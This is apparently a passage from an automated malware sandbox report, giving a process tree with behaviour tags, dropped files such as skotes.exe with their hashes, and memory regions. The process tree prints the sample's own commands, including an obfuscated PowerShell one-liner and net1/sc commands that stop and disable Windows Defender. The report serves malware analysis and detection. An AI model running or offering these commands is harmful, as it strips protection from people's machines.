                                  6⤵
                                    PID:5272
                            • C:\Users\Admin\AppData\Local\Temp\1013739001\50452030ad.exe
                              "C:\Users\Admin\AppData\Local\Temp\1013739001\50452030ad.exe"
                              3⤵
                              • Modifies Windows Defender Real-time Protection settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:824
                        • C:\Windows\servicing\TrustedInstaller.exe
                          C:\Windows\servicing\TrustedInstaller.exe
                          1⤵
                            PID:3980
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                              2⤵
                              • Modifies Windows Defender Real-time Protection settings
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4680
                              • C:\Windows\SysWOW64\sc.exe
                                "C:\Windows\system32\sc.exe" qc windefend
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:3952
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:5032
                              • C:\Windows\SysWOW64\whoami.exe
                                "C:\Windows\system32\whoami.exe" /groups
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1444
                              • C:\Windows\SysWOW64\net1.exe
                                "C:\Windows\system32\net1.exe" stop windefend
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4676
                              • C:\Windows\SysWOW64\sc.exe
                                "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                3⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:5012
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2632 -ip 2632
                            1⤵
                              PID:5080
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2832 -ip 2832
                              1⤵
                                PID:2488
                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:1744
                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:5680

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                Filesize

                                2KB

                                MD5

                                712a00a9d8164b3b6795c4e11800d2f1

                                SHA1

                                82952ef15a2e4e2b06cb149d3b206d11135128b5

                                SHA256

                                2a3b20384f9ce1100ea1c1d3fc24b874446506c627102da75ace1e7bcac4a052

                                SHA512

                                ab87d76996cf96e76f9182f72ffe16b1e014ac1ccbe2991a6cd85309622365fbf4a6e79023e616c529640f626cd3943bab9338816bf6ce6831cf5696d28ecd17

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G94T3PNL\download[1].htm

                                Filesize

                                1B

                                MD5

                                cfcd208495d565ef66e7dff9f98764da

                                SHA1

                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                SHA256

                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                SHA512

                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                21KB

                                MD5

                                676cab6a6cfc2cef8ac1a760a2be8bbf

                                SHA1

                                5d503d9ff7c9735967e6c40d0515aabd2e004714

                                SHA256

                                d64fd5b03113068b5af5ad9d3a5b123c2a4a422f57eb3deaa486c126e91425d5

                                SHA512

                                8a56c8a74889d019f39a19f705e0490acf3bd1ae41311e272b3adc57cb9d925141c64dc0cd432ff4e9236c90f04d0b1ea73fd38c7aed279d8fc2db4ff9b72e30

                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qgf82dd5.default-release\activity-stream.discovery_stream.json.tmp

                                Filesize

                                19KB

                                MD5

                                0746f782228262631f9d4ff8fc20e5c0

                                SHA1

                                abbb0734518f315d52ceef527f5d551cea8a4c65

                                SHA256

                                6aafee0db8f36f3a112230e2eed20ab5adf559a10de3ae9dc37eaae1c9bd6164

                                SHA512

                                c1aa49bb5f231315653ab2ed2cff47a7d7647c29435d373b97ba98777c9f25a5d9db1c5c5dffea22e2dc4e94cdb2f196c282aec98e2e024eb76eedcf8e17f051

                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qgf82dd5.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

                                Filesize

                                13KB

                                MD5

                                5d827bf3f5552e058fd74dc4a52a1067

                                SHA1

                                796767976496f615e502b3d7957878fb6ddaa6a5

                                SHA256

                                283d122ae4673fdd99de2d14aec16e70f831a0f86c2a8a2b652d0653ec0b0eae

                                SHA512

                                ca598fa212ff543f84764b1ecec9484aec3f390582f10a24cf64d4039958bfdbc1106d398f3f6f7a096028d28cc9250049c68ba3139adad0c07495c5f961642e

                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qgf82dd5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                Filesize

                                15KB

                                MD5

                                96c542dec016d9ec1ecc4dddfcbaac66

                                SHA1

                                6199f7648bb744efa58acf7b96fee85d938389e4

                                SHA256

                                7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                SHA512

                                cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                              • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe

                                Filesize

                                1.7MB

                                MD5

                                40f8c17c136d4dc83b130c9467cf6dcc

                                SHA1

                                e9b6049aa7da0af9718f2f4ae91653d9bac403bb

                                SHA256

                                cafb60920939bd2079d96f2e6e73f87632bc15bd72998f864e8968f7aab9623b

                                SHA512

                                6760a0752957535ec45ce3307e31569ac263eb73157d6a424d6e30647651a4e93db7c0378028d9e0ce07e65a357d2bb81047064ccda2f6a13fa7402ee7794c2d

                              • C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe

                                Filesize

                                3.6MB

                                MD5

                                5400651ebb0ecd81c935230ef3da29fb

                                SHA1

                                051db5331dc3061a478d16188a71d07a331a0b47

                                SHA256

                                6a9b3fe4414a52544b0f34d301b969d090ea26fa0e50a804a9c6294a5ccc7438

                                SHA512

                                e50505e2b346eac15a7320719239f1e9004d8cbff072df7d76a84fd795ef3bc5c0a17c429d36bb9e81329f80f20546806f3582f29562884ebbab2be95e3ed96f

                              • C:\Users\Admin\AppData\Local\Temp\1013735001\f138def07d.exe

                                Filesize

                                1.9MB

                                MD5

                                89984b4d62b3092f0527fe87c1e5c6ca

                                SHA1

                                9bdcf0585839783b2086027c4102400f948c0d9b

                                SHA256

                                cab9ba56e264feaf0e2812b368b02800d0f6bfa7b205d040765c8d4a0e2b4407

                                SHA512

                                7a627fd2bdbc128b3675d04447bc1c32fb017fa106aafa90c8223840abdd2934d4db849a42acaa9c7b3c1ce2847d3914d42a05b89c069b435b5486c1011e7c84

                              • C:\Users\Admin\AppData\Local\Temp\1013736001\c92de24d75.exe

                                Filesize

                                1.8MB

                                MD5

                                78eec814d6034177867d547093eaf7d8

                                SHA1

                                d8267c5ab4bc8a1194901ef66d0d1ea65b2d40a1

                                SHA256

                                8bfdc1e85021c5cb619aa4d502a5a6cb16cba8cc0c3442828db08dbcdf0a68b2

                                SHA512

                                38bfb3e5dd2e3c4ddb6d226d1fa11c5cba75870b53908a7839ce669c84b1fe83197fd06a2c9e953b4f486d8b926d4966deaa533a28fd8c29dd70ae6db7bb3637

                              • C:\Users\Admin\AppData\Local\Temp\1013737001\5a5b5e6249.exe

                                Filesize

                                1.7MB

                                MD5

                                288001b65d38a2878e7d1f424b419f3c

                                SHA1

                                c215fe8ed0d086ce614fcba865954697364dfde8

                                SHA256

                                868eda914f608108639b82ddad28ba808eed057111f6d82ad8a3d20c1773be63

                                SHA512

                                4e4983ddb993e4c2956f241608ee95b04796a62dc170181b400dde198dc2225ba95db96f8c63163624355cbce5c6ce552b3e1d552b401032dfc2a723f3aaa59f

                              • C:\Users\Admin\AppData\Local\Temp\1013738001\9b2bbd9be9.exe

                                Filesize

                                947KB

                                MD5

                                a955eb764df77529739f6643d791d4a4

                                SHA1

                                ee5831be1b650ae2e85e2dc98dce70d7f12d6a00

                                SHA256

                                8f157c568304079aed462f6de759a8a406f4349921daba8c9ba53a47980413f5

                                SHA512

                                53695cb1b1c2b2be7483449311989ec44ef1086b133e6c62f0f3b01ea8bdf1e2c1d7bcce9a269dacb70a5b2adc3afea4bc66d33516e8e7474569b6cbad54ab82

                              • C:\Users\Admin\AppData\Local\Temp\1013739001\50452030ad.exe

                                Filesize

                                2.6MB

                                MD5

                                09d5a4c9aaaf68609b57f50ef9bc3d10

                                SHA1

                                35ce908eb0034288bd5cbdcfe46b992a7a5de041

                                SHA256

                                787d624b7d5ca90212789c2cb876db3da2429108729f25f2e6a20f0c64b2473a

                                SHA512

                                ad2f7f8e451210c86a394704e8805d4c497d4b42d6cedfad46167d04a5f1cc6e437e87872569ded77d7106d166880355390ba2f08cdec7a538b847ca5a88d11e

                              • C:\Users\Admin\AppData\Local\Temp\1Ep2fbUSyg

                                Filesize

                                116KB

                                MD5

                                f70aa3fa04f0536280f872ad17973c3d

                                SHA1

                                50a7b889329a92de1b272d0ecf5fce87395d3123

                                SHA256

                                8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                SHA512

                                30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                              • C:\Users\Admin\AppData\Local\Temp\KIquDdouFo

                                Filesize

                                114KB

                                MD5

                                ab87d892a202f83f7e925c5e294069e8

                                SHA1

                                0b86361ff41417a38ce3f5b5250bb6ecd166a6a1

                                SHA256

                                bdc61a1c60fe8c08fe7a5256e9c8d7ad1ba4dd0963a54357c484256fc8834130

                                SHA512

                                f9a03eaae52d7fb544047fea3ffa7d8c6f7debdbb907348adfc46545e7b6c3783427983f16885ae138e43e51eec6ce73520c38581e4d9bb7140beeae2137de41

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ol150pny.erx.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                                Filesize

                                3.1MB

                                MD5

                                f8018bbe2183b62993997b8f62c299da

                                SHA1

                                dad03527414a7d258cf7e3436f7d3712b80594f9

                                SHA256

                                d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3

                                SHA512

                                5a5f0512046f219a471731c3e548dab7d3ddb861e302f35a9961776578a31a3ca08b27e8f728027e5c4246fe7285eceb1da553f36ebcd4d7e4d299f54692134b

                              • C:\Users\Admin\AppData\Local\Temp\mTq4sYPWVF

                                Filesize

                                40KB

                                MD5

                                a182561a527f929489bf4b8f74f65cd7

                                SHA1

                                8cd6866594759711ea1836e86a5b7ca64ee8911f

                                SHA256

                                42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                SHA512

                                9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                              • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                Filesize

                                479KB

                                MD5

                                09372174e83dbbf696ee732fd2e875bb

                                SHA1

                                ba360186ba650a769f9303f48b7200fb5eaccee1

                                SHA256

                                c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                                SHA512

                                b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                              • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                Filesize

                                13.8MB

                                MD5

                                0a8747a2ac9ac08ae9508f36c6d75692

                                SHA1

                                b287a96fd6cc12433adb42193dfe06111c38eaf0

                                SHA256

                                32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                                SHA512

                                59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                              • C:\Users\Admin\AppData\Local\Temp\v63keZlD5I.bat

                                Filesize

                                210B

                                MD5

                                b341263436a7cdf8c50075fa8dbe2ca9

                                SHA1

                                c454a15c0ae1282dde59e7d0e8036ef7e26110ec

                                SHA256

                                4bdc0bd832ff05458f378f8e35ebd0dd365ec67f9b39f3ea560cbc5b7565a5a4

                                SHA512

                                b43a578260e7795601d32795a8194e9ddd851dffd0db4cd0d0b1d5daad8044d9d3240f5ecf161a72f88b99d0b209a5c80f95cb8247e7af296d3037631dab4043

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\AlternateServices.bin

                                Filesize

                                6KB

                                MD5

                                34af81dc1aa7982cad3336887ea26019

                                SHA1

                                092ccfc0bbdaa9d138abb03ac68605dfe7a2400f

                                SHA256

                                35779cecc149bdd308762e865a89eaf456c84831163c757a30c820e280d2b0a0

                                SHA512

                                1a236fd3b55ff6682ec2eecd5cc45b26e0aa963bc9cd34082896923b70888f8d0245b98f4e7b0d346807bd3362610770a73175872de658e21ae47299ad4edda8

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\AlternateServices.bin

                                Filesize

                                7KB

                                MD5

                                a607885234a58e583d90534d37961cd4

                                SHA1

                                bdcf988ab0709612daa0c1eb5f8c6c499ab01ef4

                                SHA256

                                b548c67354b61929658832bc6777c1642d50ab207aa287c81b4ebc0366bbecf9

                                SHA512

                                86d9f20ad5507642b55129b97cd81256315d930f7a5064c8b28fe0cb1cd987e47670e047d93ffc8961d51783c369376f05212e7cf0b549d356218bb15b437b37

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\AlternateServices.bin

                                Filesize

                                8KB

                                MD5

                                c0b07a6626a4fe606bb0c769ca303a8a

                                SHA1

                                29c97eb3c7f48c9ca03661e7e1ae7cb288d63abc

                                SHA256

                                e936ca85de78e2bbcf380355909fe626d4a9726504fe76170de9bf6bdd4029ce

                                SHA512

                                36253eef61950f15ad4f613cdb4fa432197af5b59a1d75960338f409dd50fd65dd69d73bf04323c294c6b7e4ff40a3b4d072c5978636007a21f76b45439f9cf2

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\AlternateServices.bin

                                Filesize

                                13KB

                                MD5

                                bbb6c21c6dc27fd122a3c630a802bd66

                                SHA1

                                65145369ca7a8fe71233ffad1341e21e621f5abd

                                SHA256

                                3e5b0c3c044802180d78bfe61db1d92919b9695d8d705fa7640d1fd272fe2255

                                SHA512

                                19c2c815e40635334d5fd820c431f780022e1c6e723fd372aaa43e0e900b1a499bb4fa7a0e4991c96a59a9e379c1d0b9d7f19953733a2f3418635e5df78cfd50

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\cookies.sqlite-wal

                                Filesize

                                256KB

                                MD5

                                08d4c2d724d3a32a16bbe99343258e5a

                                SHA1

                                629802bbdd28679b8ac385d038c593885a421514

                                SHA256

                                58282a744b2dd22ae337ea8621b95a17bc4f963438a7a0d5f8210a92b3c821eb

                                SHA512

                                af7d72bbcf3da0b97e3129ad0f00eb14bb5b00c5204a52e747f4935643d3fadf492d097b45f5b9727a68dbc2f2b1bd92b3bb5455b2402e4707d43bc0e59da14b

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\datareporting\glean\db\data.safe.tmp

                                Filesize

                                6KB

                                MD5

                                ccb956a8e1bc6a61e71508f6b3c04115

                                SHA1

                                33fc15c126a122d26cc39e5eb8e4f383874f50af

                                SHA256

                                02f60b70e2c8453eb50a8ae403b7d110f9466053f8609eff04f3c9aa0f5b21aa

                                SHA512

                                409602884ae4de81c76a95b0ad08fee066ffe6511e86b23e200ca7031e35faeff29dade174632d74cbc6f1b80c5674f02c2a4164f6fa797737ed232447e950ad

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\datareporting\glean\db\data.safe.tmp

                                Filesize

                                5KB

                                MD5

                                b0a24ce69d1a94435879012a4b98424a

                                SHA1

                                8edc7674d7a9efb2fb19b406968fcc2a6b2fc287

                                SHA256

                                73be5b17c08fab3b43ed6cdd6db3ed751ae690b787d033688213a5892460af7e

                                SHA512

                                4752d73375585bcda02be14bdcb386a04587b8cea3dbe62c9de37459bd5a2a08eb8b402c6997b2f28cca8717398b7e809189679bcfb10681fd28efc0c53d83db

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\datareporting\glean\db\data.safe.tmp

                                Filesize

                                15KB

                                MD5

                                d6b5e32d79903481477a99e7ce06a154

                                SHA1

                                1d71156ef0619bd7a30f7337b3d5256f70dddd75

                                SHA256

                                63f006476462f8be9e72e6488263fc6ee1d98b6ede7551cc4d9e02fc67df02e7

                                SHA512

                                506b3fd0a5f3489000ddc3e92d92f828325c0e417df161344c8824f2990b6b9d249a2f2ddbb6f9f0313bd1f7bbacbfbd50cf102d35ca0d41e987471ea940d9e8

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\datareporting\glean\pending_pings\0429f43d-9728-4410-a121-d5912e9478ce

                                Filesize

                                982B

                                MD5

                                7ca3a0d8a723c4b2baa77892d30a8c7a

                                SHA1

                                4b6c2a5f48ea859aa277dd0f19d1d8119a2222c7

                                SHA256

                                71badc81b99dc75cbd4a1417573cad5938e73f51aab1ea97a11a9592d0a890f6

                                SHA512

                                ba503bf57d4277487fc6c154942b29cb9d272d3a77659b11a4c3401138bc560429ca5521fe1dd27d2bae4bdd2656590b2b8a500d2509c8bc6e45fb79a862806a

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\datareporting\glean\pending_pings\a6196316-1c24-4276-97f0-0eba29cb032e

                                Filesize

                                26KB

                                MD5

                                e5bbcdf786189189676a68b7a02f6e44

                                SHA1

                                08a11cf204d421f256a636583ad62882235cc365

                                SHA256

                                7fdd09dfcf7775e4f5f474b84f5fee7be78944cefcc25402bb883b0a12110885

                                SHA512

                                d27eafea40a26e453ad4191bed435284eaea2eefd5b3065c13b7245e8a9f228480c7edfd620b65fd1f175e5f78edaf44a5b392d2bb79da2d260b96c4a9f6004e

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\datareporting\glean\pending_pings\d01fce53-e373-4205-adb1-f7e3d1ecd8d6

                                Filesize

                                671B

                                MD5

                                339700a5903226224c0e96ca34ce6eea

                                SHA1

                                05594ae3f97ee5d446f9c2026932ea9f60385599

                                SHA256

                                57c226fc8fd44f62c00afe94221b24e472d1b6c3313e693a890f09ff7d2c0717

                                SHA512

                                f1de90855261a75a4da7a9ed703dccded47fb63233b940a85cd979457ee5bbd2558941fb215da1b152ab35ece66ba24e7fed60d2b520ad017d5fccfa729fbd47

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                Filesize

                                1.1MB

                                MD5

                                842039753bf41fa5e11b3a1383061a87

                                SHA1

                                3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                SHA256

                                d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                SHA512

                                d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                Filesize

                                116B

                                MD5

                                2a461e9eb87fd1955cea740a3444ee7a

                                SHA1

                                b10755914c713f5a4677494dbe8a686ed458c3c5

                                SHA256

                                4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                SHA512

                                34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                Filesize

                                372B

                                MD5

                                bf957ad58b55f64219ab3f793e374316

                                SHA1

                                a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                SHA256

                                bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                SHA512

                                79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                Filesize

                                17.8MB

                                MD5

                                daf7ef3acccab478aaa7d6dc1c60f865

                                SHA1

                                f8246162b97ce4a945feced27b6ea114366ff2ad

                                SHA256

                                bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                SHA512

                                5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\prefs-1.js

                                Filesize

                                10KB

                                MD5

                                7869fd1cd12ac00622713dad40c37ff4

                                SHA1

                                fed2a9ed0506d67d625f46422e3555c2bcc5ae4d

                                SHA256

                                e357b0fe17200143e3c6d22c3cea2cbb148a7a0edb944dcd4b6377f7827732f7

                                SHA512

                                7e049c50d8385f0db059bbea27eb78b9a9254eb0411c9b32f510c9ab621ad1c4a2fd0854c0df31ff83b5b784ded130ebad4398077a5a77010a25c0a60c25c5eb

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\prefs-1.js

                                Filesize

                                11KB

                                MD5

                                72df380a0204cab64e88ab73b05767f5

                                SHA1

                                2aeb55675a7b3f499745dafe36d058f191a93a4b

                                SHA256

                                34a735b54ec441c2e06918f70287c1308f6ab09f67e344b09e0647255ccf51fc

                                SHA512

                                afe0f7125240475d458b185f09e654122144a769ce2593f0d00fb828627150c96e5d21b69a2d71574d5c06176f56cad5ac4cfc17899413361460ba58cb530394

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qgf82dd5.default-release\prefs.js

                                Filesize

                                11KB

                                MD5

                                9dad838ba7ceb302e424da4315f5f760

                                SHA1

                                84c1c202bf2b44d3f2ffad3b89d5af40f9ca160e

                                SHA256

                                5d7caa3a7e3a80ef1a4702f7086fe016ff7ed8356d7a46de3afd1f011bf35e62

                                SHA512

                                e7fd69060d71b2965de81bdae11779b3cc0527b591f881e33be25339289dc5d1ea15ba3e698b31eaba22cc121bbf4427cc1edf486ee3df022c2ff7b7f64fc712

                              • C:\dllnet\HyperServerFontdll.exe

                                Filesize

                                3.3MB

                                MD5

                                1ea029e7274746e01f4c285d638f2a1c

                                SHA1

                                1e582b370a95fe21c9a55d317830cb6f5a2d8e6b

                                SHA256

                                eeddee0a57a540792aac5854451c760ccf3912db09a0dfbebbd5a175413587ed

                                SHA512

                                99d16c1626b7e48a5f7303fa8595dbc9544383b6734904e39c0b8e20fc90c6229d18ee544b95d1a54236f74bb59af25f2f9eb0681a2acf8e392d244cf31e90d4

                              • C:\dllnet\J0k4As.bat

                                Filesize

                                203B

                                MD5

                                eecba84beeb16a6f77a1345dc5c50d9a

                                SHA1

                                76c75599399493be5fa20e6065cf72ef05e238a0

                                SHA256

                                31a4b66ee13c7872264957aaa0bc36fcb780473e7d6096853f20ad45b541696e

                                SHA512

                                54e38ff09bf1e3fb8a7582c81acf2a329d039e85c2309624fd4209decded578b5db16e4e0a6325e476ee97228849431f5229bb8d21b0263ab1d955619ba4c75f

                              • C:\dllnet\yLU75wsHgukerTkv.vbe

                                Filesize

                                201B

                                MD5

                                cbbe2c3d8f2c923ccac8ef7d747b8a20

                                SHA1

                                b308635869370794019b9337dd326d97f79ee094

                                SHA256

                                c4f65a5c34ae749bd3dbaba98e14a5443e4a84a8aa48800c29c6fc3df8739d7c

                                SHA512

                                6451e45b0bfd329d89ee4f8b696fb20739619038471d9401dde5cd174df24f0b82bd3715e8910bece8542639638d846f9f16317b695f1f00832cf790d106b0eb

                              • memory/384-77-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-3101-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-76-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-727-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-748-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-3092-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-21-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-602-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-19-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-22-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-3094-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-2641-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-3100-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-20-0x0000000000801000-0x0000000000869000-memory.dmp

                                Filesize

                                416KB

                              • memory/384-3099-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-209-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-3095-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-23-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-48-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-47-0x0000000000801000-0x0000000000869000-memory.dmp

                                Filesize

                                416KB

                              • memory/384-3086-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/384-1522-0x0000000000800000-0x0000000000B1A000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/824-324-0x00000000003D0000-0x0000000000680000-memory.dmp

                                Filesize

                                2.7MB

                              • memory/824-323-0x00000000003D0000-0x0000000000680000-memory.dmp

                                Filesize

                                2.7MB

                              • memory/824-325-0x00000000003D0000-0x0000000000680000-memory.dmp

                                Filesize

                                2.7MB

                              • memory/824-726-0x00000000003D0000-0x0000000000680000-memory.dmp

                                Filesize

                                2.7MB

                              • memory/824-723-0x00000000003D0000-0x0000000000680000-memory.dmp

                                Filesize

                                2.7MB

